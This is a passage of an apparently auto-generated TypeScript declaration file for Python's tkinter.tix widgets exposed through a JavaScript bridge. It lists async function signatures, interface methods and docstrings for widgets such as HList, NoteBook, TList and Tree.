FileSelectBox stores the files most\n\t\t * recently selected into a ComboBox widget so that they can be quickly\n\t\t * selected again.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * selection ComboBox\n\t\t * filter ComboBox\n\t\t * dirlist ScrolledListBox\n\t\t * filelist ScrolledListBox\n\t\t */\n\t\tfunction FileSelectBox(master, cnf?): Promise<IFileSelectBox>\n\t\tfunction FileSelectBox$({ master, cnf }: { master, cnf?}): Promise<IFileSelectBox>\n\t\tinterface IFileSelectBox extends ITixWidget {\n\t\t\tapply_filter(): Promise<any>\n\t\t\tapply_filter$($: {}): Promise<any>\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * FileSelectDialog - Motif style file select dialog.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * btns StdButtonBox\n\t\t * fsbox FileSelectBox\n\t\t */\n\t\tfunction FileSelectDialog(master, cnf?): Promise<IFileSelectDialog>\n\t\tfunction FileSelectDialog$({ master, cnf }: { master, cnf?}): Promise<IFileSelectDialog>\n\t\tinterface IFileSelectDialog extends ITixWidget {\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * FileEntry - Entry field with button that invokes a FileSelectDialog.\n\t\t * The user can type in the filename manually. Alternatively, the user can\n\t\t * press the button widget that sits next to the entry, which will bring\n\t\t * up a file selection dialog.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * button Button\n\t\t * entry Entry\n\t\t */\n\t\tfunction FileEntry(master, cnf?): Promise<IFileEntry>\n\t\tfunction FileEntry$({ master, cnf }: { master, cnf?}): Promise<IFileEntry>\n\t\tinterface IFileEntry extends ITixWidget {\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t\tfile_dialog(): Promise<any>\n\t\t\tfile_dialog$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * HList - Hierarchy display widget can be used to display any data\n\t\t * that have a hierarchical structure, for example, file system directory\n\t\t * trees. 
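\n\t\t * \n\t\t * A minimal population sketch via this bridge (passing options through\n\t\t * cnf as an object is an assumption):\n\t\t * \n\t\t *     const h = await HList(root)\n\t\t *     await h.add('top', { text: 'Top' })\n\t\t *     await h.add('top.child', { text: 'Child' })\n\t\t * \n\t\t * 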
The list entries are indented and connected by branch lines\n\t\t * according to their places in the hierarchy.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction HList(master?, cnf?): Promise<IHList>\n\t\tfunction HList$({ master, cnf }: { master?, cnf?}): Promise<IHList>\n\t\tinterface IHList extends ITixWidget {\n\t\t\tadd(entry, cnf?): Promise<any>\n\t\t\tadd$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tadd_child(parent?, cnf?): Promise<any>\n\t\t\tadd_child$({ parent, cnf }: { parent?, cnf?}): Promise<any>\n\t\t\tanchor_set(entry): Promise<any>\n\t\t\tanchor_set$({ entry }): Promise<any>\n\t\t\tanchor_clear(): Promise<any>\n\t\t\tanchor_clear$($: {}): Promise<any>\n\t\t\tcolumn_width(col?, width?, chars?): Promise<any>\n\t\t\tcolumn_width$({ col, width, chars }: { col?, width?, chars?}): Promise<any>\n\t\t\tdelete_all(): Promise<any>\n\t\t\tdelete_all$($: {}): Promise<any>\n\t\t\tdelete_entry(entry): Promise<any>\n\t\t\tdelete_entry$({ entry }): Promise<any>\n\t\t\tdelete_offsprings(entry): Promise<any>\n\t\t\tdelete_offsprings$({ entry }): Promise<any>\n\t\t\tdelete_siblings(entry): Promise<any>\n\t\t\tdelete_siblings$({ entry }): Promise<any>\n\t\t\tdragsite_set(index): Promise<any>\n\t\t\tdragsite_set$({ index }): Promise<any>\n\t\t\tdragsite_clear(): Promise<any>\n\t\t\tdragsite_clear$($: {}): Promise<any>\n\t\t\tdropsite_set(index): Promise<any>\n\t\t\tdropsite_set$({ index }): Promise<any>\n\t\t\tdropsite_clear(): Promise<any>\n\t\t\tdropsite_clear$($: {}): Promise<any>\n\t\t\theader_create(col, cnf?): Promise<any>\n\t\t\theader_create$({ col, cnf }: { col, cnf?}): Promise<any>\n\t\t\theader_configure(col, cnf?): Promise<any>\n\t\t\theader_configure$({ col, cnf }: { col, cnf?}): Promise<any>\n\t\t\theader_cget(col, opt): Promise<any>\n\t\t\theader_cget$({ col, opt }): Promise<any>\n\t\t\theader_exists(col): Promise<any>\n\t\t\theader_exists$({ col }): Promise<any>\n\t\t\theader_delete(col): Promise<any>\n\t\t\theader_delete$({ col }): Promise<any>\n\t\t\theader_size(col): Promise<any>\n\t\t\theader_size$({ col }): Promise<any>\n\t\t\thide_entry(entry): Promise<any>\n\t\t\thide_entry$({ entry }): Promise<any>\n\t\t\tindicator_create(entry, cnf?): Promise<any>\n\t\t\tindicator_create$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tindicator_configure(entry, cnf?): Promise<any>\n\t\t\tindicator_configure$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tindicator_cget(entry, opt): Promise<any>\n\t\t\tindicator_cget$({ entry, opt }): Promise<any>\n\t\t\tindicator_exists(entry): Promise<any>\n\t\t\tindicator_exists$({ entry }): Promise<any>\n\t\t\tindicator_delete(entry): Promise<any>\n\t\t\tindicator_delete$({ entry }): Promise<any>\n\t\t\tindicator_size(entry): Promise<any>\n\t\t\tindicator_size$({ entry }): Promise<any>\n\t\t\tinfo_anchor(): Promise<any>\n\t\t\tinfo_anchor$($: {}): Promise<any>\n\t\t\tinfo_bbox(entry): Promise<any>\n\t\t\tinfo_bbox$({ entry }): Promise<any>\n\t\t\tinfo_children(entry?): Promise<any>\n\t\t\tinfo_children$({ entry }: { entry?}): Promise<any>\n\t\t\tinfo_data(entry): Promise<any>\n\t\t\tinfo_data$({ entry }): Promise<any>\n\t\t\tinfo_dragsite(): Promise<any>\n\t\t\tinfo_dragsite$($: {}): Promise<any>\n\t\t\tinfo_dropsite(): Promise<any>\n\t\t\tinfo_dropsite$($: {}): Promise<any>\n\t\t\tinfo_exists(entry): Promise<any>\n\t\t\tinfo_exists$({ entry }): Promise<any>\n\t\t\tinfo_hidden(entry): Promise<any>\n\t\t\tinfo_hidden$({ entry }): Promise<any>\n\t\t\tinfo_next(entry): Promise<any>\n\t\t\tinfo_next$({ entry }): 
Promise<any>\n\t\t\tinfo_parent(entry): Promise<any>\n\t\t\tinfo_parent$({ entry }): Promise<any>\n\t\t\tinfo_prev(entry): Promise<any>\n\t\t\tinfo_prev$({ entry }): Promise<any>\n\t\t\tinfo_selection(): Promise<any>\n\t\t\tinfo_selection$($: {}): Promise<any>\n\t\t\titem_cget(entry, col, opt): Promise<any>\n\t\t\titem_cget$({ entry, col, opt }): Promise<any>\n\t\t\titem_configure(entry, col, cnf?): Promise<any>\n\t\t\titem_configure$({ entry, col, cnf }: { entry, col, cnf?}): Promise<any>\n\t\t\titem_create(entry, col, cnf?): Promise<any>\n\t\t\titem_create$({ entry, col, cnf }: { entry, col, cnf?}): Promise<any>\n\t\t\titem_exists(entry, col): Promise<any>\n\t\t\titem_exists$({ entry, col }): Promise<any>\n\t\t\titem_delete(entry, col): Promise<any>\n\t\t\titem_delete$({ entry, col }): Promise<any>\n\t\t\tentrycget(entry, opt): Promise<any>\n\t\t\tentrycget$({ entry, opt }): Promise<any>\n\t\t\tentryconfigure(entry, cnf?): Promise<any>\n\t\t\tentryconfigure$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tnearest(y): Promise<any>\n\t\t\tnearest$({ y }): Promise<any>\n\t\t\tsee(entry): Promise<any>\n\t\t\tsee$({ entry }): Promise<any>\n\t\t\tselection_clear(cnf?): Promise<any>\n\t\t\tselection_clear$({ cnf }: { cnf?}): Promise<any>\n\t\t\tselection_includes(entry): Promise<any>\n\t\t\tselection_includes$({ entry }): Promise<any>\n\t\t\tselection_set(first, last?): Promise<any>\n\t\t\tselection_set$({ first, last }: { first, last?}): Promise<any>\n\t\t\tshow_entry(entry): Promise<any>\n\t\t\tshow_entry$({ entry }): Promise<any>\n\t\t\theader_exist\n\t\t}\n\n\t\t/**\n\t\t * InputOnly - Invisible widget. Unix only.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction InputOnly(master?, cnf?): Promise<IInputOnly>\n\t\tfunction InputOnly$({ master, cnf }: { master?, cnf?}): Promise<IInputOnly>\n\t\tinterface IInputOnly extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * LabelEntry - Entry field with label. Packages an entry widget\n\t\t * and a label into one mega widget. It can be used to simplify the creation\n\t\t * of ``entry-form'' type of interface.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * label Label\n\t\t * entry Entry\n\t\t */\n\t\tfunction LabelEntry(master?, cnf?): Promise<ILabelEntry>\n\t\tfunction LabelEntry$({ master, cnf }: { master?, cnf?}): Promise<ILabelEntry>\n\t\tinterface ILabelEntry extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * LabelFrame - Labelled Frame container. Packages a frame widget\n\t\t * and a label into one mega widget. To create widgets inside a\n\t\t * LabelFrame widget, one creates the new widgets relative to the\n\t\t * frame subwidget and manages them inside the frame subwidget.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * label Label\n\t\t * frame Frame\n\t\t */\n\t\tfunction LabelFrame(master?, cnf?): Promise<ILabelFrame>\n\t\tfunction LabelFrame$({ master, cnf }: { master?, cnf?}): Promise<ILabelFrame>\n\t\tinterface ILabelFrame extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * A ListNoteBook widget is very similar to the TixNoteBook widget:\n\t\t * it can be used to display many windows in a limited space using a\n\t\t * notebook metaphor. The notebook is divided into a stack of pages\n\t\t * (windows). 
At one time only one of these pages can be shown.\n\t\t * The user can navigate through these pages by\n\t\t * choosing the name of the desired page in the hlist subwidget.\n\t\t */\n\t\tfunction ListNoteBook(master, cnf?): Promise<IListNoteBook>\n\t\tfunction ListNoteBook$({ master, cnf }: { master, cnf?}): Promise<IListNoteBook>\n\t\tinterface IListNoteBook extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tpage(name): Promise<any>\n\t\t\tpage$({ name }): Promise<any>\n\t\t\tpages(): Promise<any>\n\t\t\tpages$($: {}): Promise<any>\n\t\t\traise_page(name): Promise<any>\n\t\t\traise_page$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The Meter widget can be used to show the progress of a background\n\t\t * job which may take a long time to execute.\n\t\t * \n\t\t */\n\t\tfunction Meter(master?, cnf?): Promise<IMeter>\n\t\tfunction Meter$({ master, cnf }: { master?, cnf?}): Promise<IMeter>\n\t\tinterface IMeter extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * NoteBook - Multi-page container widget (tabbed notebook metaphor).\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * nbframe NoteBookFrame\n\t\t * <pages> page widgets added dynamically with the add method\n\t\t */\n\t\tfunction NoteBook(master?, cnf?): Promise<INoteBook>\n\t\tfunction NoteBook$({ master, cnf }: { master?, cnf?}): Promise<INoteBook>\n\t\tinterface INoteBook extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tdelete(name): Promise<any>\n\t\t\tdelete$({ name }): Promise<any>\n\t\t\tpage(name): Promise<any>\n\t\t\tpage$({ name }): Promise<any>\n\t\t\tpages(): Promise<any>\n\t\t\tpages$($: {}): Promise<any>\n\t\t\traise_page(name): Promise<any>\n\t\t\traise_page$({ name }): Promise<any>\n\t\t\traised(): Promise<any>\n\t\t\traised$($: {}): Promise<any>\n\t\t}\n\t\tinterface INoteBookFrame extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * OptionMenu - creates a menu button of options.\n\t\t * \n\t\t * Subwidget Class\n\t\t * --------- -----\n\t\t * menubutton Menubutton\n\t\t * menu Menu\n\t\t */\n\t\tfunction OptionMenu(master, cnf?): Promise<IOptionMenu>\n\t\tfunction OptionMenu$({ master, cnf }: { master, cnf?}): Promise<IOptionMenu>\n\t\tinterface IOptionMenu extends ITixWidget {\n\t\t\tadd_command(name, cnf?): Promise<any>\n\t\t\tadd_command$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tadd_separator(name, cnf?): Promise<any>\n\t\t\tadd_separator$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tdelete(name): Promise<any>\n\t\t\tdelete$({ name }): Promise<any>\n\t\t\tdisable(name): Promise<any>\n\t\t\tdisable$({ name }): Promise<any>\n\t\t\tenable(name): Promise<any>\n\t\t\tenable$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * PanedWindow - Multi-pane container widget that\n\t\t * allows the user to interactively manipulate the sizes of several\n\t\t * panes. 
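\n\t\t * \n\t\t * A construction sketch via this bridge (pane names hypothetical):\n\t\t * \n\t\t *     const pw = await PanedWindow(root)\n\t\t *     const listPane = await pw.add('list')\n\t\t *     const textPane = await pw.add('text')\n\t\t * \n\t\t * 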
The panes can be arranged either vertically or horizontally. The\n\t\t * user changes the sizes of the panes by dragging the resize handle\n\t\t * between two panes.\n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * <panes> g/p widgets added dynamically with the add method.\n\t\t */\n\t\tfunction PanedWindow(master, cnf?): Promise<IPanedWindow>\n\t\tfunction PanedWindow$({ master, cnf }: { master, cnf?}): Promise<IPanedWindow>\n\t\tinterface IPanedWindow extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tdelete(name): Promise<any>\n\t\t\tdelete$({ name }): Promise<any>\n\t\t\tforget(name): Promise<any>\n\t\t\tforget$({ name }): Promise<any>\n\t\t\tpanecget(entry, opt): Promise<any>\n\t\t\tpanecget$({ entry, opt }): Promise<any>\n\t\t\tpaneconfigure(entry, cnf?): Promise<any>\n\t\t\tpaneconfigure$({ entry, cnf }: { entry, cnf?}): Promise<any>\n\t\t\tpanes(): Promise<any>\n\t\t\tpanes$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * PopupMenu widget can be used as a replacement for the tk_popup command.\n\t\t * The advantage of the Tix PopupMenu widget is that it requires less application\n\t\t * code to manipulate.\n\t\t * \n\t\t * \n\t\t * Subwidgets Class\n\t\t * ---------- -----\n\t\t * menubutton Menubutton\n\t\t * menu Menu\n\t\t */\n\t\tfunction PopupMenu(master, cnf?): Promise<IPopupMenu>\n\t\tfunction PopupMenu$({ master, cnf }: { master, cnf?}): Promise<IPopupMenu>\n\t\tinterface IPopupMenu extends ITixWidget {\n\t\t\tbind_widget(widget): Promise<any>\n\t\t\tbind_widget$({ widget }): Promise<any>\n\t\t\tunbind_widget(widget): Promise<any>\n\t\t\tunbind_widget$({ widget }): Promise<any>\n\t\t\tpost_widget(widget, x, y): Promise<any>\n\t\t\tpost_widget$({ widget, x, y }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Internal widget to draw resize handles on Scrolled widgets.\n\t\t */\n\t\tfunction ResizeHandle(master, cnf?): Promise<IResizeHandle>\n\t\tfunction ResizeHandle$({ master, cnf }: { master, cnf?}): Promise<IResizeHandle>\n\t\tinterface IResizeHandle extends ITixWidget {\n\t\t\tattach_widget(widget): Promise<any>\n\t\t\tattach_widget$({ widget }): Promise<any>\n\t\t\tdetach_widget(widget): Promise<any>\n\t\t\tdetach_widget$({ widget }): Promise<any>\n\t\t\thide(widget): Promise<any>\n\t\t\thide$({ widget }): Promise<any>\n\t\t\tshow(widget): Promise<any>\n\t\t\tshow$({ widget }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * ScrolledHList - HList with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledHList(master, cnf?): Promise<IScrolledHList>\n\t\tfunction ScrolledHList$({ master, cnf }: { master, cnf?}): Promise<IScrolledHList>\n\t\tinterface IScrolledHList extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledListBox - Listbox with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledListBox(master, cnf?): Promise<IScrolledListBox>\n\t\tfunction ScrolledListBox$({ master, cnf }: { master, cnf?}): Promise<IScrolledListBox>\n\t\tinterface IScrolledListBox extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledText - Text with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledText(master, cnf?): Promise<IScrolledText>\n\t\tfunction ScrolledText$({ master, cnf }: { master, cnf?}): Promise<IScrolledText>\n\t\tinterface IScrolledText extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledTList - TList with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledTList(master, cnf?): Promise<IScrolledTList>\n\t\tfunction ScrolledTList$({ master, cnf }: { master, cnf?}): Promise<IScrolledTList>\n\t\tinterface 
IScrolledTList extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * ScrolledWindow - Window with automatic scrollbars.\n\t\t */\n\t\tfunction ScrolledWindow(master, cnf?): Promise<IScrolledWindow>\n\t\tfunction ScrolledWindow$({ master, cnf }: { master, cnf?}): Promise<IScrolledWindow>\n\t\tinterface IScrolledWindow extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * Select - Container of button subwidgets. It can be used to provide\n\t\t * radio-box or check-box style of selection options for the user.\n\t\t * \n\t\t * Subwidgets are buttons added dynamically using the add method.\n\t\t */\n\t\tfunction Select(master, cnf?): Promise<ISelect>\n\t\tfunction Select$({ master, cnf }: { master, cnf?}): Promise<ISelect>\n\t\tinterface ISelect extends ITixWidget {\n\t\t\tadd(name, cnf?): Promise<any>\n\t\t\tadd$({ name, cnf }: { name, cnf?}): Promise<any>\n\t\t\tinvoke(name): Promise<any>\n\t\t\tinvoke$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Toplevel window.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction Shell(master?, cnf?): Promise<IShell>\n\t\tfunction Shell$({ master, cnf }: { master?, cnf?}): Promise<IShell>\n\t\tinterface IShell extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * Toplevel window, with popup, popdown and center methods.\n\t\t * It tells the window manager that it is a dialog window and should be\n\t\t * treated specially. The exact treatment depends on\n\t\t * the window manager.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction DialogShell(master?, cnf?): Promise<IDialogShell>\n\t\tfunction DialogShell$({ master, cnf }: { master?, cnf?}): Promise<IDialogShell>\n\t\tinterface IDialogShell extends ITixWidget {\n\t\t\tpopdown(): Promise<any>\n\t\t\tpopdown$($: {}): Promise<any>\n\t\t\tpopup(): Promise<any>\n\t\t\tpopup$($: {}): Promise<any>\n\t\t\tcenter(): Promise<any>\n\t\t\tcenter$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * StdButtonBox - Standard Button Box (OK, Apply, Cancel and Help) \n\t\t */\n\t\tfunction StdButtonBox(master?, cnf?): Promise<IStdButtonBox>\n\t\tfunction StdButtonBox$({ master, cnf }: { master?, cnf?}): Promise<IStdButtonBox>\n\t\tinterface IStdButtonBox extends ITixWidget {\n\t\t\tinvoke(name): Promise<any>\n\t\t\tinvoke$({ name }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * TList - Hierarchy display widget which can be\n\t\t * used to display data in a tabular format. The list entries of a TList\n\t\t * widget are similar to the entries in the Tk listbox widget. 
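\n\t\t * \n\t\t * A usage sketch via this bridge (the cnf option names are assumptions):\n\t\t * \n\t\t *     const tl = await TList(root)\n\t\t *     await tl.insert(0, { itemtype: 'text', text: 'first cell' })\n\t\t * \n\t\t * 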
The main\n\t\t * differences are (1) the TList widget can display the list entries in a\n\t\t * two dimensional format and (2) you can use graphical images as well as\n\t\t * multiple colors and fonts for the list entries.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction TList(master?, cnf?): Promise<ITList>\n\t\tfunction TList$({ master, cnf }: { master?, cnf?}): Promise<ITList>\n\t\tinterface ITList extends ITixWidget {\n\t\t\tactive_set(index): Promise<any>\n\t\t\tactive_set$({ index }): Promise<any>\n\t\t\tactive_clear(): Promise<any>\n\t\t\tactive_clear$($: {}): Promise<any>\n\t\t\tanchor_set(index): Promise<any>\n\t\t\tanchor_set$({ index }): Promise<any>\n\t\t\tanchor_clear(): Promise<any>\n\t\t\tanchor_clear$($: {}): Promise<any>\n\t\t\tdelete(from_, to?): Promise<any>\n\t\t\tdelete$({ from_, to }: { from_, to?}): Promise<any>\n\t\t\tdragsite_set(index): Promise<any>\n\t\t\tdragsite_set$({ index }): Promise<any>\n\t\t\tdragsite_clear(): Promise<any>\n\t\t\tdragsite_clear$($: {}): Promise<any>\n\t\t\tdropsite_set(index): Promise<any>\n\t\t\tdropsite_set$({ index }): Promise<any>\n\t\t\tdropsite_clear(): Promise<any>\n\t\t\tdropsite_clear$($: {}): Promise<any>\n\t\t\tinsert(index, cnf?): Promise<any>\n\t\t\tinsert$({ index, cnf }: { index, cnf?}): Promise<any>\n\t\t\tinfo_active(): Promise<any>\n\t\t\tinfo_active$($: {}): Promise<any>\n\t\t\tinfo_anchor(): Promise<any>\n\t\t\tinfo_anchor$($: {}): Promise<any>\n\t\t\tinfo_down(index): Promise<any>\n\t\t\tinfo_down$({ index }): Promise<any>\n\t\t\tinfo_left(index): Promise<any>\n\t\t\tinfo_left$({ index }): Promise<any>\n\t\t\tinfo_right(index): Promise<any>\n\t\t\tinfo_right$({ index }): Promise<any>\n\t\t\tinfo_selection(): Promise<any>\n\t\t\tinfo_selection$($: {}): Promise<any>\n\t\t\tinfo_size(): Promise<any>\n\t\t\tinfo_size$($: {}): Promise<any>\n\t\t\tinfo_up(index): Promise<any>\n\t\t\tinfo_up$({ index }): Promise<any>\n\t\t\tnearest(x, y): Promise<any>\n\t\t\tnearest$({ x, y }): Promise<any>\n\t\t\tsee(index): Promise<any>\n\t\t\tsee$({ index }): Promise<any>\n\t\t\tselection_clear(cnf?): Promise<any>\n\t\t\tselection_clear$({ cnf }: { cnf?}): Promise<any>\n\t\t\tselection_includes(index): Promise<any>\n\t\t\tselection_includes$({ index }): Promise<any>\n\t\t\tselection_set(first, last?): Promise<any>\n\t\t\tselection_set$({ first, last }: { first, last?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Tree - The tixTree widget can be used to display hierarchical\n\t\t * data in a tree form. The user can adjust\n\t\t * the view of the tree by opening or closing parts of the tree.\n\t\t */\n\t\tfunction Tree(master?, cnf?): Promise<ITree>\n\t\tfunction Tree$({ master, cnf }: { master?, cnf?}): Promise<ITree>\n\t\tinterface ITree extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * This command calls the setmode method for all the entries in this\n\t\t\t * Tree widget: if an entry has no child entries, its mode is set to\n\t\t\t * none. 
Otherwise, if the entry has any hidden child entries, its mode is\n\t\t\t * set to open; otherwise its mode is set to close.\n\t\t\t */\n\t\t\tautosetmode(): Promise<any>\n\t\t\tautosetmode$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Close the entry given by entryPath if its mode is close.\n\t\t\t */\n\t\t\tclose(entrypath): Promise<any>\n\t\t\tclose$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current mode of the entry given by entryPath.\n\t\t\t */\n\t\t\tgetmode(entrypath): Promise<any>\n\t\t\tgetmode$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Open the entry given by entryPath if its mode is open.\n\t\t\t */\n\t\t\topen(entrypath): Promise<any>\n\t\t\topen$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * This command is used to indicate whether the entry given by\n\t\t\t * entryPath has child entries and whether the children are visible. mode\n\t\t\t * must be one of open, close or none. If mode is set to open, a (+)\n\t\t\t * indicator is drawn next to the entry. If mode is set to close, a (-)\n\t\t\t * indicator is drawn next to the entry. If mode is set to none, no\n\t\t\t * indicators will be drawn for this entry. The default mode is none. The\n\t\t\t * open mode indicates the entry has hidden children and this entry can be\n\t\t\t * opened by the user. The close mode indicates that all the children of the\n\t\t\t * entry are now visible and the entry can be closed by the user.\n\t\t\t */\n\t\t\tsetmode(entrypath, mode?): Promise<any>\n\t\t\tsetmode$({ entrypath, mode }: { entrypath, mode?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * The CheckList widget\n\t\t * displays a list of items to be selected by the user. CheckList acts\n\t\t * similarly to the Tk checkbutton or radiobutton widgets, except it is\n\t\t * capable of handling many more items than checkbuttons or radiobuttons.\n\t\t * \n\t\t */\n\t\tfunction CheckList(master?, cnf?): Promise<ICheckList>\n\t\tfunction CheckList$({ master, cnf }: { master?, cnf?}): Promise<ICheckList>\n\t\tinterface ICheckList extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * This command calls the setmode method for all the entries in this\n\t\t\t * Tree widget: if an entry has no child entries, its mode is set to\n\t\t\t * none. Otherwise, if the entry has any hidden child entries, its mode is\n\t\t\t * set to open; otherwise its mode is set to close.\n\t\t\t */\n\t\t\tautosetmode(): Promise<any>\n\t\t\tautosetmode$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Close the entry given by entryPath if its mode is close.\n\t\t\t */\n\t\t\tclose(entrypath): Promise<any>\n\t\t\tclose$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current mode of the entry given by entryPath.\n\t\t\t */\n\t\t\tgetmode(entrypath): Promise<any>\n\t\t\tgetmode$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Open the entry given by entryPath if its mode is open.\n\t\t\t */\n\t\t\topen(entrypath): Promise<any>\n\t\t\topen$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a list of items whose status matches status. If status is\n\t\t\t * not specified, the list of items in the \"on\" status will be returned.\n\t\t\t * Mode can be on, off, default\n\t\t\t */\n\t\t\tgetselection(mode?): Promise<any>\n\t\t\tgetselection$({ mode }: { mode?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the current status of entryPath.\n\t\t\t */\n\t\t\tgetstatus(entrypath): Promise<any>\n\t\t\tgetstatus$({ entrypath }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Sets the status of entryPath to be status. 
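\n\t\t\t * \n\t\t\t * For example (a sketch; the widget handle and entry path are\n\t\t\t * hypothetical):\n\t\t\t * \n\t\t\t *     await checklist.setstatus('item0', 'on')\n\t\t\t * \n\t\t\t * 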
A bitmap will be\n\t\t\t * displayed next to the entry according to whether its status is on, off or default.\n\t\t\t */\n\t\t\tsetstatus(entrypath, mode?): Promise<any>\n\t\t\tsetstatus$({ entrypath, mode }: { entrypath, mode?}): Promise<any>\n\t\t}\n\t\tinterface I_dummyButton extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyCheckbutton extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyEntry extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyFrame extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyLabel extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyListbox extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyMenu extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyMenubutton extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyScrollbar extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyText extends ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyScrolledListBox extends IScrolledListBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyHList extends IHList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyScrolledHList extends IScrolledHList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyTList extends ITList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyComboBox extends IComboBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyDirList extends IDirList, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyDirSelectBox extends IDirSelectBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyExFileSelectBox extends IExFileSelectBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyFileSelectBox extends IFileSelectBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyFileComboBox extends IComboBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyStdButtonBox extends IStdButtonBox, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyNoteBookFrame extends INoteBookFrame, ITixSubWidget {\n\t\t}\n\t\tinterface I_dummyPanedWindow extends IPanedWindow, ITixSubWidget {\n\t\t}\n\n\t\t/**\n\t\t * This file implements the Canvas Object View widget. This is a base\n\t\t * class of IconView. It implements automatic placement/adjustment of the\n\t\t * scrollbars according to the canvas objects inside the canvas subwidget.\n\t\t * The scrollbars are adjusted so that the canvas is just large enough\n\t\t * to see all the objects.\n\t\t * \n\t\t */\n\t\tinterface ICObjView extends ITixWidget {\n\t\t}\n\n\t\t/**\n\t\t * The Tix Grid command creates a new window and makes it into a\n\t\t * tixGrid widget. Additional options may be specified on the command\n\t\t * line or in the option database to configure aspects such as its cursor\n\t\t * and relief.\n\t\t * \n\t\t * A Grid widget displays its contents in a two dimensional grid of cells.\n\t\t * Each cell may contain one Tix display item, which may be in text,\n\t\t * graphics or other formats. See the DisplayStyle class for more 